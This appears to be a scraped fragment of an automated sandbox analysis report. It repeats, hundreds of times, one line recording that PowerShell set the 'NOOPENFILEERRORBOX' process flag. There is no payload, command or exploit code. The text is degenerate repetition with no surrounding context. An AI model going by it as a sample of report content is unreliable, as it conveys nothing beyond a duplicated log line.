            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
